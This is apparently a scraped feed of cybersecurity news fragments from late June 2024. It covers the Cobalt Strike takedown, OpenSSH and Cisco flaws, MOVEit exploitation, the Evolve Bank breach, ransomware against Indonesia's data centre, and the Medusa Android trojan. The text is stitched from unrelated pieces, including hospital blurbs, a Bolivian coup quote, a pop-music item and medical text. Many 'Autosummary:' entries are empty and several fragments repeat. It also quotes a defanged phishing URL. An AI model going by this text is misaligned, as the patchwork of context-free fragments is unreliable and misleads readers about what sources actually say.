Private industry partners like BAE Systems Digital Intelligence, Trellix, Spamhaus, abuse.ch, and The Shadowserver Foundation also offered their support during this international law enforcement operation, providing help via their enhanced scanning, telemetry, and analytical capabilities to identify Cobalt Strike servers used in cybercriminal campaigns. "Autosummary:
It offers a wide range of medical services, including Emergency Services, General Surgical Services, Intensive Care Unit (ICU), Medical Surgical Unit, Orthopedic Surgical Services, and Urgent Care. "Autosummary:
In Europe, the policy change would include posts, images, image captions, comments and Stories that users over the age of 18 had shared with a public audience on Facebook and Instagram, but not private messages. "Autosummary:
"Autosummary:
By generating phishing emails that are grammatically correct, contextually appropriate, and free of typical red flags that might alert the recipient, they can easily trick people and businesses into downloading info-stealing malware on their devices or into divulging sensitive information or transferring money. Look for reviews and ratings for the place, check if the price is roughly similar to those for “competing” houses or apartments, and reverse-search the image to see what comes up – it is likely a free stock image or it was stolen from other websites. Booking.com never asks for information like your full credit card details, social security number, or passwords via email or chat. "Autosummary:
"Autosummary:
"Autosummary:
“ The vulnerability impacts the following devices: MDS 9000 Series Multilayer Switches (CSCwj97007) Nexus 3000 Series Switches (CSCwj97009) Nexus 5500 Platform Switches (CSCwj97011) Nexus 5600 Platform Switches (CSCwj97011) Nexus 6000 Series Switches (CSCwj97011) Nexus 7000 Series Switches (CSCwj94682) * Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009) Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin. "Autosummary:
Until the situation clears up, Google Pixel 6, 6a, and 6 Pro owners should not perform factory resets and take regular backups on a separate device. "Autosummary:
However, Prudential is now saying the stolen data also impacted many customers and included: Full names Driving license numbers Non-driving license identification cards The data breach notification states that the company will be giving affected customers 24 months of identity theft and credit monitoring services through Kroll. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
In summary, user convenience in MFA solutions is essential to ensure high adoption rates, reduce errors and support costs, enhance security, maintain productivity, and improve overall user satisfaction.However, legacy MFA systems including Knowledge Based Authentication (KBA), One Time Passwords (OTP), and authentication apps, developed twenty years ago, are increasingly inadequate against modern cyberattacks. The Case for Implementing Next-Generation MFA To effectively combat the virtual tsunami of ransomware attacks, organizations must consider phishing-resistant, next-generation MFA technologies.Separately, RISK & INSURANCE, a leading media source for the insurance industry reported recently that in 2023 the median ransom demand soared to $20 million in 2023 from $1.4 million in 2022, and payment skyrocketed to $6.5 million in 2023 from $335,000 in 2022, much more than 500%. "Autosummary:
"Autosummary:
"Autosummary:
Full VM escape: $250,000 Arbitrary memory write: $100,000 Arbitrary memory read: $50,000 Relative memory write: $50,000 Denial of service: $20,000 Relative memory read: $10,000 The kvmCTF infrastructure is hosted on Google"s Bare Metal Solution (BMS) environment, highlighting the program"s commitment to high-security standards. "Autosummary:
It offers a wide range of financial services, including checking and savings accounts, loans, credit cards, investment services, and insurance plans. "Autosummary:
"On June 25, 2024, Evolve Bank & Trust ("Evolve"), the third-party issuer of the Affirm Card, notified Affirm (the Company) that Evolve had experienced a cybersecurity incident whereby a third party gained unauthorized access to personal information and financial information ("Personal Information") of Evolve retail banking customers and the customers of its financial technology partners," reads the 8-K filing. "Autosummary:
“On June 25, 2024, Evolve Bank & Trust (“Evolve”), the third-party issuer of the Affirm Card, notified the Company that Evolve had experienced a cybersecurity incident whereby a third party gained unauthorized access to personal information and financial information (“Personal Information”) of Evolve retail banking customers and the customers of its financial technology partners.” Wise was sharing data with Evolve Bank & Trust to receive USD account details from the bank, including name, address, date of birth, contact details, SSN or EIN for US customers, or another identity document number for non-US customers. "Autosummary:
Abuses userinfo part of a URL to look real The phishing link included in the email (defanged for your safety) has a rather interesting structure: hxxps://metamask.io:login@zpr[.]io/x4hFSxCxEqcd Contrary to how the URL appears, it"s not leading you to "metamask.io", but zpr[.]io instead. The Canadian router manufacturer, Mercku provides equipment to Canadian and European Internet Service providers (ISP) and networking companies including Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom. "Autosummary:
Threat actors actively exploit D-Link DIR-859 router flaw CVE-2024-0769 Pierluigi Paganini July 01, 2024 July 01, 2024 Experts spotted threat actors exploiting the critical vulnerability CVE-2024-0769 affects all D-Link DIR-859 WiFi routers. "Autosummary:
"This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access. "Autosummary:
"Autosummary:
"The vulnerability, which is a signal handler race condition in OpenSSH"s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today. "Autosummary:
Nexus 3000 Series Switches Nexus 5500 Platform Switches Nexus 5600 Platform Switches Nexus 6000 Series Switches Nexus 7000 Series Switches Nexus 9000 Series Switches in standalone NX-OS mode The security flaw also enables attackers to execute commands without triggering system syslog messages, thus allowing them to conceal signs of compromise on hacked NX-OS devices. "Autosummary:
"Autosummary:
"Autosummary:
(Source: The PC Security Channel) Just weeks ago, the AhnLab Security Intelligence Center (ASEC) wrote about a growing number of cases where cybercriminals hijack popular YouTube channels, including one with 800,000 subscribers, and exploit them to distribute malware such as RedLine Stealer, Vidar and Lumma Stealer. Report and block suspicious content Report any suspicious or harmful content, comments, links, or users to YouTube. In another tried-and-tested technique, attackers leverage lists of usernames and passwords from past data breaches to break into existing accounts, relying on the fact that many people reuse passwords across different sites. "Autosummary:
"Autosummary:
Brain Cipher dark web negotiation site Source: BleepingComputer New data leak site launched Like other ransomware operations, Brain Cipher will breach a corporate network and spread laterally to other devices. "Autosummary:
“IMS is also providing individuals with information on how to place a fraud alert and security freeze on one’s credit file, information on protecting against tax fraud, the contact details for the national credit reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for fraud and identity theft by reviewing account statements and monitoring credit reports, and encouragement to contact the Federal Trade Commission, their Attorney General, and law enforcement to report attempted or actual identity theft and fraud.” IMS determined that exposed data includes: Names, Social Security numbers, Medical information, Biometric data, Financial account information, and Passport numbers. "Autosummary:
"Autosummary:
"Autosummary:
The hijacking attacks targeting TCP could then be weaponized to poison a victim"s HTTP web page or stage denial-of-service (DoS) attacks, per the researchers, who said patches for the vulnerability are being readied by the OpenWrt community as well as router vendors like 360, Huawei, Linksys, Mercury, TP-Link, Ubiquiti, and Xiaomi. "Autosummary:
"Autosummary:
Ticketmaster data sold on a hacking forum Source: BleepingComputer Samples of the data seen by BleepingComputer contained more than just "basic contact information," including full names, email addresses, phone numbers, addresses, hashed credit card details, and payment amounts. "Autosummary:
"Following best-practice architecture, we have a strong segregation of the Corporate IT, the production environment, and the TeamViewer connectivity platform in place," continues TeamViewer"s statement. TeamViewer says they believe their internal corporate network, not their production environment, was breached on Wednesday, June 26, using an employee"s credentials. "Autosummary:
The lawsuit claims that Temu’s app can sneakily access “a user’s camera, specific location, contacts, text messages, documents, and other applications.” "Autosummary:
"Autosummary:
"Autosummary:
"This week, we are continuing notifications to customers who corresponded with Microsoft corporate email accounts that were exfiltrated by the Midnight Blizzard threat actor," said a Microsoft spokesperson. "Autosummary:
"Autosummary:
" Furthermore, in 2023, less than one quarter (23%) of all companies submitting claims had paid ransom demands, a decline from previous years. "Autosummary:
The hospital did not reveal the type of attack that hit its systems, however, HelpnetSecurity reported that this week a series of DDoS attacks targeted the websites of several Croatian government and financial institutions, including the Ministry of Finance, the Tax Administration, the Croatian National Bank, the Economic Bank of Zagreb, and the Zagreb Stock Exchange. "Autosummary:
The researchers believe that two other attacks, against a government entity in East Asia and an aviation organization in the Indian subcontinent are also the work of ChamelGang, based on the use of known TTPs, publicly available tooling seen in previous engagements, and their custom malware BeaconLoader. "BlackBerry detected and stopped 3.1 million cyberattacks (37,000 per day) in the first quarter of 2024. Between January and March 2024, BlackBerry detected 630,000 malicious hashes, representing a 40% increase from its previous reporting period. 60% of attacks targeting industry were directed at critical infrastructure, including government, healthcare, financial, and communication industries, of which 40% targeted the financial sector. “Each iteration of this report highlights startling new trends: novel malware is growing with no signs … More
The post New ransomware, infostealers pose growing risk in 2024 appeared first on Help Net Security.
"Autosummary:
60% of attacks targeting industry were directed at critical infrastructure, including government, healthcare, financial, and communication industries, of which 40% targeted the financial sector. "Last year alone, over 30,000 new vulnerabilities were published, with a new vulnerability emerging approximately every 17 minutes — averaging 600 new vulnerabilities per week, according to Skybox Security. The report highlights a critical gap in remediation efforts, with the average time to patch exceeding 100 days, contrasted against the finding that 75% of new vulnerabilities are exploited in 19 days or less. These findings underscore the urgent need for continuous exposure management and modern … More
The post 75% of new vulnerabilities exploited within 19 days appeared first on Help Net Security.
"Autosummary:
Last year alone, over 30,000 new vulnerabilities were published, with a new vulnerability emerging approximately every 17 minutes — averaging 600 new vulnerabilities per week, according to Skybox Security. The report highlights a critical gap in remediation efforts, with the average time to patch exceeding 100 days, contrasted against the finding that 75% of new vulnerabilities are exploited in 19 days or less. "Autosummary:
"A critical SQL injection vulnerability in Fortra FileCatalyst Workflow (CVE-2024-5276) has been patched; a PoC exploit is already available online. While there’s currently no reports of in-the-wild exploitation, enterprise admins are advised to patch their installations as soon as possible. About CVE-2024-5276 Fortra FileCatalyst is an enterprise software solution for accellerated, UDP-based file transfer of large files. It includes the following components: FileCatalyst Direct (a suite of server and client applications for file transfer) Workflow … More
The post PoC exploit for critical Fortra FileCatalyst flaw published (CVE-2024-5276) appeared first on Help Net Security.
"Autosummary:
"A federal grand jury in Maryland returned an indictment charging a Russian citizen with conspiracy to hack into and destroy computer systems and data. If convicted, he faces a maximum penalty of five years in prison. The U.S. Department of State’s Rewards for Justice program is offering a reward of up to $10 million for information on his location or his malicious cyberactivity. In advance of the full-scale Russian invasion of Ukraine, targets included Ukrainian … More
The post US offers $10 million for information on indicted WhisperGate malware suspect appeared first on Help Net Security.
"Autosummary:
On Jan. 13, 2022, the Conspirators attacked multiple Ukrainian government networks, including the Ukrainian Ministry of International Affairs, the State Treasury, the Judiciary Administration, the State Portal for Digital Services, the Ministry of Education and Science, the Ministry of Agriculture, the State Service for Food Safety and Consumer Protection, the Ministry of Energy, the Accounting Chamber for Ukraine, the State Emergency Service, the State Forestry Agency, and the Motor Insurance Bureau. "Autosummary:
"From August 5, 2021, through February 3, 2022, the conspirators leveraged the same computer infrastructure they used in the Ukraine-related attacks to probe computers belonging to a federal government agency in Maryland in the same manner as they had initially probed the Ukrainian Government networks," the Justice Department (DoJ) said. "Autosummary:
"Autosummary:
“Like the ransomware, the usermode rootkit suffers from a fatal flaw; if the initial access is Redis, it is likely that it will only affect the Redis user as the Redis user is only used to run the Redis server and won’t have access to other user’s home directories.” continues the report.New P2Pinfect version delivers miners and ransomware on Redis servers Pierluigi Paganini June 27, 2024 June 27, 2024 Researchers warn that the P2Pinfect worm is targeting Redis servers with ransomware and cryptocurrency mining payloads. "Autosummary:
"The University Hospital Centre Zagreb (KBC Zagreb) is under cyberattack that started on Wednesday night, the Croatian Radiotelevision has reported. Because of the attack, the hospital has shut down its information system and will be switching parts of it online once they are sure it’s safe to do so. All services are working, but the processing of patients is slower than usual, Milivoj Novak, Assistant Director at the hospital, has said in a press conference. … More
The post Largest Croatian hospital under cyberattack appeared first on Help Net Security.
"Autosummary:
DDoS on Croatian institutions It is currently unknown whether the cyberattack against the hospital involved the deployment of ransomware, and whether it’s connected to yesterday’s DDoS attacks on the websites of several Croatian government and financial institutions: the Ministry of Finance, the Tax Administration, the Croatian National Bank (HNB), the Economic Bank of Zagreb (PBZ), and the Zagreb Stock Exchange (ZSE). "Autosummary:
"Autosummary:
“We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible” - GitLab GitLab has addressed the vulnerability by releasing versions 17.1.1, 17.0.3, and 16.11.5, and recommends users to apply the updates as soon as possible. "Autosummary:
"Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility," ASEC said, highlighting the use of Behinder, China Chopper, Godzilla, BadPotato, cpolar, and RingQ. It also comes as Fortinet FortiGuard Labs pointed out that botnets such as UNSTABLE, Condi, and Skibidi are abusing legitimate cloud storage and computing services operators to distribute malware payloads and updates to a broad range of devices. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2022-24816 GeoSolutionsGroup JAI-EXT Code Injection Vulnerability CVE-2022-2586 Linux Kernel Use-After-Free Vulnerability CVE-2020-13965 Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability Below are the descriptions of the flaws added to the KEV catalog: GeoServer Flaw CVE-2022-24816 (CVSS score of 9.8) is a code injection issue in the Jai-Ext open source project. "Autosummary:
You could be eligible for a reward and relocation" - Rewards for Justice If arrested and convicted, Stigal faces a potential maximum sentence of five years in prison for his participation in cyberattacks against Ukraine, the U.S., and other NATO member countries. "Autosummary:
The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City, and San Francisco.” "Autosummary:
"Autosummary:
The threat actors say they"ll publish all of the stolen data on July 1 if a ransom is not paid, including contacts, confidential documents, employee data, business plans, and financial data. "Autosummary:
In the case of Unfurling Hemlock, KrakenLabs analysts observed the following malware, loaders, and utilities dropped on victims" machines: Redline : A popular stealer malware that extracts sensitive information such as credentials, financial data, and cryptocurrency wallets. From the analyzed samples, the researchers deduced that over half of all Unfurling Hemlock attacks targeted systems in the United States, while relatively high-volume activity was also seen in Germany, Russia, Turkey, India, and Canada. : Operates on the Malware-as-a-Service (MaaS) model, capable of stealing data from numerous browsers and extensions, cryptocurrency wallets, and applications like Steam and Telegram. "CISO Influx | Indonesia | Remote – View job details As a CISO, you will be responsible for protecting Influx from information security risks through the development, implementation, and maintenance of our security program (policies, procedures, and standards). Cloud Security Engineer Atom | United Kingdom | Remote – View job details As a Cloud Security Engineer, you’ll design, develop and deliver the security model of Atom bank’s cloud environment ensuring that infrastructure, applications, and processes … More
The post Cybersecurity jobs available right now: June 26, 2024 appeared first on Help Net Security.
"Autosummary:
Offensive Security Topic Leader – Offensive Security, Malware, Command and Control (C2) Kyndryl | Germany | On-site – View job details As an Offensive Security Topic Leader – Offensive Security, Malware, Command and Control (C2), you will develop, standardize, and maintain advanced Malware and C2 operations, alongside strategic Red Teaming exercises. Cloud Security Engineer Atom | United Kingdom | Remote – View job details As a Cloud Security Engineer, you’ll design, develop and deliver the security model of Atom bank’s cloud environment ensuring that infrastructure, applications, and processes remain inline with various security standards, legal, regulatory, and industry best practice frameworks. Cybersecurity Engineer – Cloud GM Financial | USA | On-site – View job details The Cybersecurity Engineer – Cloud will be responsible for developing, deploying, monitoring, tuning, evaluating, reporting, and maintaining systems and procedures; and to identify and mitigate threats to the corporate network, corporate assets and corporate users. Penetration Test North America Lead JPMorganChase | USA | On-site – View job details As a Penetration Test North America Lead, design and execute testing and simulations – such as penetration tests, technical controls assessments, cyber exercises, or resiliency simulations, and contribute to the development and refinement of assessment methodologies, tools, and frameworks to ensure alignment with the firm’s strategy and compliance with regulatory requirements. "Autosummary:
Cybersecurity researchers have discovered an updated version of an Android banking trojan called Medusa that has been used to target users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S. The new fraud campaigns, observed in May 2024 and active since July 2023, manifested through five different botnets operated by various affiliates, cybersecurity firm Cleafy said in an analysis published last week. "Autosummary:
Unlike other Android malware, though, Snowblind abuses "seccomp", short for secure computing, a Linux kernel feature that Android uses for integrity checks on applications, to protect users against malicious actions such as application repackaging. "Autosummary:
"A newly spotted campaign is leveraging BPL sideloading and other uncommon tricks to deliver the IDAT Loader (aka HijackLoader) malware and prevent its detection. The campaign Spotted by Kroll’s incident responders and analyzed by the company’s Cyber Threat Intelligence (CTI) team, the campaign involves: A Bollywood pirate movie download site pointing to page hosted on the Bunny content delivery platform, which in turn points to a ZIP file Within that ZIP file, another password-protected ZIP … More
The post Malware peddlers experimenting with BPL sideloading and masking malicious payloads as PGP keys appeared first on Help Net Security.
"Autosummary:
The campaign Spotted by Kroll’s incident responders and analyzed by the company’s Cyber Threat Intelligence (CTI) team, the campaign involves: A Bollywood pirate movie download site pointing to page hosted on the Bunny content delivery platform, which in turn points to a ZIP file Within that ZIP file, another password-protected ZIP file and a text file with the password Within that second ZIP file, a LNK file and a decoy “trailer” video file “The LNK file triggered the first element of the novel technique used in this infection chain for distributing IDAT Loader. "Autosummary:
"Autosummary:
Tracked as CVE-2024-27867, the authentication issue affects AirPods (2nd generation and later), AirPods Pro (all models), AirPods Max, Powerbeats Pro, and Beats Fit Pro. "When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," Apple said in a Tuesday advisory. "Autosummary:
Public exploit available Tenable discovered CVE-2024-5276 on May 15, 2024, and first disclosed the issue to Fortra on May 22, along with a proof-of-concept (PoC) exploit demonstrating the vulnerability. "Autosummary:
Patches released for CVE-2024-5806 As Progress explained in the security bulletin, CVE-2024-5806 impacts the following product versions: 2023.0.0 before 2023.0.11 2023.1.0 before 2023.1.6 2024.0.0 before 2024.0.2 Fixes were made available in MOVEit Transfer 2023.0.11, 2023.1.6, and 2024.0.2, available on the Progress Community portal. "Autosummary:
The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City and San Francisco. However, when that deadline passed and the data was released, people who looked at the data found it did not, in fact, belong to the Federal Reserve but instead to a particular financial organization: Evolve Bank & Trust. At that time, the US Federal Reserve Board penalized Evolve Bancorp and its subsidiary, Evolve Bank & Trust, for multiple “deficiencies” in the bank’s risk management, anti-money laundering (AML) and compliance practices. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
"Autosummary:
"You better hire another negotiator within 48 hours, and fire this clinical idiot who values Americans" bank secrecy at $50,000." LockBit claims it attacked the Fed, leaks data (Hackmanac) Eventually, the group began publishing the stolen data on its site.By claiming to have… — AzAl Security (@azalsecurity) June 26, 2024 Previously notorious for executing ransomware attacks on high-profile targets like Boeing, the Continental automotive giant, the Italian Internal Revenue Service, Bank of America, the UK Royal Mail, and most recently London Drugs, the cybercrime group found itself in hot waters this year. "Autosummary:
New MOVEit Transfer critical bug is actively exploited Pierluigi Paganini June 26, 2024 June 26, 2024 Experts warn of active exploitation of a critical authentication bypass vulnerability in MOVEit Transfer file transfer software. "Autosummary:
Mr Arce subsequently urged Bolivians to mobilise against a "coup d"etat" "We need the Bolivian people to organize and mobilize against the coup d"etat in favor of democracy," Arce said in a televised message to the country alongside his ministers inside the presidential palace. "In this Help Net Security interview, Kunal Modasiya, VP of Product Management and Growth at Qualys, explores the key features, significant advantages, and innovative technologies behind Qualys CyberSecurity Asset Management 3.0. Can you explain the key features of Qualys CyberSecurity Asset Management 3.0 and how it differs from previous versions? The modern attack surface continues to evolve, and it is becoming untenable for organizations today to rely on siloed point solutions for narrow asset discovery … More
The post CISOs’ new ally: Qualys CyberSecurity Asset Management 3.0 appeared first on Help Net Security.
"Autosummary:
This includes scanning and sensors for IT assets, patent-pending EASM technology, monitoring of multi-cloud environments, built-in network passive sensing, and third-party connectors to enrich the asset inventory. Now, end-of-support (EoS) software, missing security controls (such as having no endpoint detection and response (EDR) agents), risky open ports, and misconfigured or unauthorized software and services are all baked into the TruRisk Score to help cybersecurity teams automatically pinpoint the greatest risks.In this Help Net Security interview, Kunal Modasiya, VP of Product Management and Growth at Qualys, explores the key features, significant advantages, and innovative technologies behind Qualys CyberSecurity Asset Management 3.0. Gary Bowen, director of security operations at Brown & Brown Insurance noted, “The Qualys Cloud Agent passive sensor has proven to be a game-changer, providing us with unparalleled visibility and immediate insights across our hybrid IT and OT domains, all without the complexities of identifying optimal locations for network taps. "We present a list of selected cybersecurity companies that received funding during the second quarter of 2024 (Q2 2024). Alethea April | $20 million Alethea closed a $20 million Series B funding round led by GV, with participation from Ballistic Ventures, who led Alethea’s Series A funding in 2022. Also participating in the round is Hakluyt Capital, which invests alongside leading venture capital funds, targeting companies with high growth potential and international ambitions. BforeAI April … More
The post Breaking down the numbers: Q2 2024 cybersecurity funding activity recap appeared first on Help Net Security.
"Autosummary:
StrikeReady April | $12 million StrikeReady has received $12 million in Series A funding, led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital, and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf, and Rod Beckstrom, former CEO of ICANN and Founding Director of the U.S. National Cybersecurity Center (now CISA). Transcend May | $40 million Transcend raised $40 million in Series B funding led by new investor StepStone Group, with participation from HighlandX and existing investors Accel, Index Ventures, 01 Advisors (01A), Script Capital, and South Park Commons. "Autosummary:
The ransomware targets files with specific extensions related to databases (SQL, SQLITE3, DB), documents (DOC, XLS), and media files (MP3, WAV, MKV) and appends the ".encrypted" extension to the resulting files. "Ransomware attackers wielding a LockBit variant dubbed Brain Cipher have disrupted a temporary national data center facility which supports the operations of 200+ Indonesian government agencies and public services. The attackers are asking for a $8 million ransom, which the Indonesian government is determined not to pay, according to The Jakarta Post. “As of today, Monday 24 June 2024, since 07:00 Western Standard Time, the affected Immigration Services have been operating normally. These include Visa … More
The post Ransomware disrupts Indonesia’s national data centre, LockBit gang claims US Federal Reserve breach appeared first on Help Net Security.
"Autosummary:
These include Visa and Stay Permit Services, Immigration Checkpoint Services (TPI), Passport Services, Visa on Arrival (VOA) on boarding Services, and Immigration Document Management Services,” the Indonesian Ministry of Communication and Information (KomInfo) has announced on Monday. "Autosummary:
"Autosummary:
"Autosummary:
Comparison of requested permissions Source: Cleafy Cleafy’s analysis shows that the malware authors removed 17 commands from the previous version of the malware and added five new ones: destroyo : uninstall a specific application : uninstall a specific application permdrawover : request ‘Drawing Over’ permission : request ‘Drawing Over’ permission setoverlay : set a black screen overlay : set a black screen overlay take_scr : take a screenshot : take a screenshot update_sec: update user secret The ‘setoverlay’ command is noteworthy as it allows remote attackers to perform deceptive actions such as making the device appear locked/shut off to mask malicious ODF activities occurring in the background. "Autosummary:
HacManac According to the threat actor, the stolen data included what Neiman Marcus shared, plus the last four digits of social security numbers, customer transactions, customer emails, shopping records, employee data, and millions of gift card numbers. "Autosummary:
Recovery of lost digital assets State-level authorities and federal intelligence agencies can, under certain circumstances, track stolen crypto, freeze it, and possibly divert it to safe wallets to be redistributed back to victims. "Autosummary:
"Earlier this year Europcar discovered a hacker selling info on its 50 million customers on the dark web. The European car rental company immediately launched an investigation, only to discover that the data being sold was completely doctored, possibly using generative AI. Why fake a data breach? The most obvious reason why hackers are selling fake data is because there is money to be made. When you think of it, it is like a criminal … More
The post Why are threat actors faking data breaches? appeared first on Help Net Security.
"Autosummary:
Uncovering security processes and setup: Just like you need bait to hook a fish, cybercriminals can use the pretext of a data breach to understand a company’s security setup, its security capabilities, processes, and threat response time.Threat actors can announce a fake data breach, which can spark fears, panic and loss of public confidence, causing the stock prices to drop; in this way, cybercriminals can manipulate the market for financial gain. "Autosummary:
The group exploited the following vulnerabilities for privilege escalation: CVE-2022-2586, CVE-2021-3156, CVE-2021-4034, CVE-2019-13272, CVE-2022-27228, CVE-2021-44228, CVE-2021-40438, CVE-2023-3519, BDU:2023-05857, and CVE-2019-12725. "Autosummary:
The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City, and San Francisco.” "Autosummary:
Ransomware threat landscape Jan-Apr 2024: insights and challenges Pierluigi Paganini June 24, 2024 June 24, 2024 Between Jan and Apr 2024, the global ransomware landscape witnessed significant activity, with 1420 ransomware claims reported worldwide. "Autosummary:
Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due. Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment. Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers. "Autosummary:
"Autosummary:
" The development comes as AI security company Protect AI warned of over 60 security defects affecting various open-source AI/ML tools, including critical issues that could lead to information disclosure, access to restricted resources, privilege escalation, and complete system takeover. "Autosummary:
Charli XCX urges fans to stop anti-Taylor chants 8 hours ago By Riyah Collins , BBC Newsbeat Share Getty Images Charli XCX says she "won"t tolerate" the chants at her shows Charli XCX has urged fans to stop chanting "Taylor Swift is dead" at her gigs. "Autosummary:
Whatever the cause, once the fire took hold, it would have spread at speed - giving the workers little time to escape, according to Kim Jae-ho, fire and disaster prevention professor at Daejeon University. "Autosummary:
Once FIN9 established access to a target network, they stole confidential data, including financial information, account credentials, employee benefits, gift cards, and credit card information. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: The rise of SaaS security teams In this Help Net Security interview, Hillary Baron, Senior Technical Director for Research at CSA, highlights that the recent surge in organizations establishing dedicated SaaS security teams is driven by significant data breaches involving widely used platforms. Enhancing security through collaboration with the open-source community In this Help Net Security interview, Alan DeKok, CEO … More
The post Week in review: CDK Global cyberattack, critical vCenter Server RCE fixed appeared first on Help Net Security.
"Autosummary:
SELKS: Open-source Suricata IDS/IPS, network security monitoring, threat hunting SELKS is a free, open-source, turnkey solution for Suricata-based network intrusion detection and protection (IDS/IPS), network security monitoring (NSM), and threat hunting. Cilium: Open-source eBPF-based networking, security, observability Cilium is an open-source, cloud-native solution that leverages eBPF technology in the Linux kernel to provide, secure, and monitor network connectivity between workloads. "Autosummary:
Threat actors are actively exploiting SolarWinds Serv-U bug CVE-2024-28995 Pierluigi Paganini June 23, 2024 June 23, 2024 Threat actors are actively exploiting a recently discovered vulnerability in SolarWinds Serv-U software using publicly available proof-of-concept (PoC) code. "Autosummary:
Friends-Of-Presta notes that all versions should be considered as potentially impacted and recommends the following mitigations: Upgrade to the latest pkfacebook version, which disables multiquery executions, even if it does not protect against SQL injection using the UNION clause. "Autosummary:
"In Brazil, despite the availability of the vaccine, the HPV vaccination rate remains low for girls - reaching only 57% - and for boys, it doesn"t exceed 40%,” he says."However, in total amputation, the urethral orifice can be relocated to the perineum, between the scrotum and the anus, requiring the patient to urinate while sitting on the toilet. "Autosummary:
"Autosummary:
Experts found a bug in the Linux version of RansomHub ransomware Pierluigi Paganini June 22, 2024 June 22, 2024 The RansomHub ransomware operators added a Linux encryptor to their arsenal, the version targets VMware ESXi environments. "Autosummary:
Suvorov (Suvorov) – Head of Kaspersky Operating System Business Unit Denis Vladimirovich Zenkin (Zenkin) – Head of Corporate Communications Marina Mikhaylovna Alekseeva (Alekseeva) – Chief Human Resources (HR) Officer (CHRO) Mikhail Yuryevich Gerber (Gerber) – Executive Vice President of Consumer Business Anton Mikhaylovich Ivanov (Ivanov) – Chief Technology Officer (CTO) Kirill Aleksandrovich Astrakhan (Astrakhan) – Executive Vice President for Corporate Business Anna Vladimirovna Kulashova (Kulashova) – Managing Director for Russia and the Commonwealth of Independent States (CIS) The individuals listed were designated under Executive Order 14024 for their involvement in the technology sector of the Russian Federation economy. Daniil Sergeyevich Borshchev (Borshchev) – Board member and Deputy CEO of Strategy and Economics Andrei Anatolyevich Efremov (Efremov) – Board member and Chief Business Development Officer (CBDO) Igor Gennadyevich Chekunov (Chekunov) – Board member Chief Legal Officer (CLO). "Autosummary:
" "As a result, the Company experienced disruptions to its dealer management system ("DMS") hosted by CDK, which supports critical dealership operations including those supporting sales, inventory and accounting functions and its customer relationship management ("CRM") system," reported Sonic Automotive in an SEC filing. "Autosummary:
As for targeted brands and models, there"s a mix of everything, including Samsung Galaxy, Google Pixel, Xiaomi Redmi, Motorola One, and devices from OnePlus, Vivo, and Huawei. "Autosummary:
As for targeted brands and models, there"s a mix of everything, including Samsung Galaxy, Google Pixel, Xiaomi Redmi, Motorola One, and devices from OnePlus, Vivo, and Huawei. "Autosummary:
The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.” "Autosummary:
Specifically, the executable serves as a pathway for a backdoor called Oyster, which is capable of gathering information about the compromised host, communicating with a hard-coded command-and-control (C2) address, and supporting remote code execution. "Autosummary:
"Autosummary:
A draft "National Security Agreement", proposed by TikTok in August 2022, would have seen the company having to follow rules such as properly funding its data protection units and making sure that ByteDance did not have access to US users" data. "Autosummary:
According to the data breach notification, a massive trove of sensitive information was stolen, including: Health insurance information (such as primary, secondary or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers); Health information (such as medical record numbers, providers, diagnoses, medicines, test results, images, care and treatment); Billing, claims and payment information (such as claim numbers, account numbers, billing codes, payment cards, financial and banking information, payments made, and balance due); and/or Other personal information such as Social Security numbers, driver’s licenses or state ID numbers, or passport numbers. "Autosummary:
"Autosummary:
Mikhail Yuryevich Gerber (Gerber) - Executive Vice President of Consumer Business Anton Mikhaylovich Ivanov (Ivanov) - Chief Technology Officer (CTO) Kirill Aleksandrovich Astrakhan (Astrakhan) - Executive Vice President for Corporate Business Anna Vladimirovna Kulashova (Kulashova) - Managing Director for Russia and the Commonwealth of Independent States (CIS) While many of these members report directly to the CEO, Eugene Kaspersky, the US government says they have not sanctioned Kaspersky Lab, its parent or subsidiary companies, or its CEO. "Autosummary:
